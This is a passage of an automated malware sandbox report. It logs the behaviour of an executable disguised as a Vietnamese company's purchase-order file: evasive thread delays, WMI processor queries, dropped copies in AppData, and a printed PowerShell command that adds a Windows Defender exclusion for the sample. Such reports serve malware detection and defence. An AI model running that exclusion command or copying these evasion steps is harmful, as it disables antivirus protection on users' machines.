                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2400000Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399868Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399748Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399640Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399531Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399419Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399297Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399181Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2399063Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398938Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398813Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398688Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398576Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398396Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398262Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2398101Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397985Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397860Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397735Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397606Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397485Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397360Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397235Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2397110Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396985Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396860Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396735Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396610Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396485Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396360Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396235Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2396110Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395985Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395860Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395699Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395336Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395219Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2395109Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394999Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394891Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394781Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394672Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394563Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394453Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394342Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394234Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394121Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2394000Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393891Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393766Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393641Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeThread delayed: delay time: 2393531Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399875Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399546Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399438Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399328Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399218Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399107Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398999Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398891Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398766Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398547Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398437Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398327Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398199Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398078Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397963Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397731Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397469Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397359Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397141Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396922Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396807Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396702Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396594Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396484Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396375Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396266Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396156Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396047Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395938Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395438Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395313Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395201Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394969Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394840Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394734Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394625Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394516Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394406Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394297Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394188Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394063Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2393953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399766
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399547
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399437
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399328
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399218
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399108
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399000
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398890
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398781
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398672
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398562
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398453
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398343
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398234
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398124
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398015
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397899
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397789
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397649
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397540
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397437
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397328
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397219
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397109
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396999
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396890
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396781
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396669
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396562
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396453
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396344
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396234
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396125
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396015
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395905
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395797
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395687
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395578
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395468
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395359
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395250
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395140
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395031
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394921
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394812
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394703
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394581
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4192184957.00000000060C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess created: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                      Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
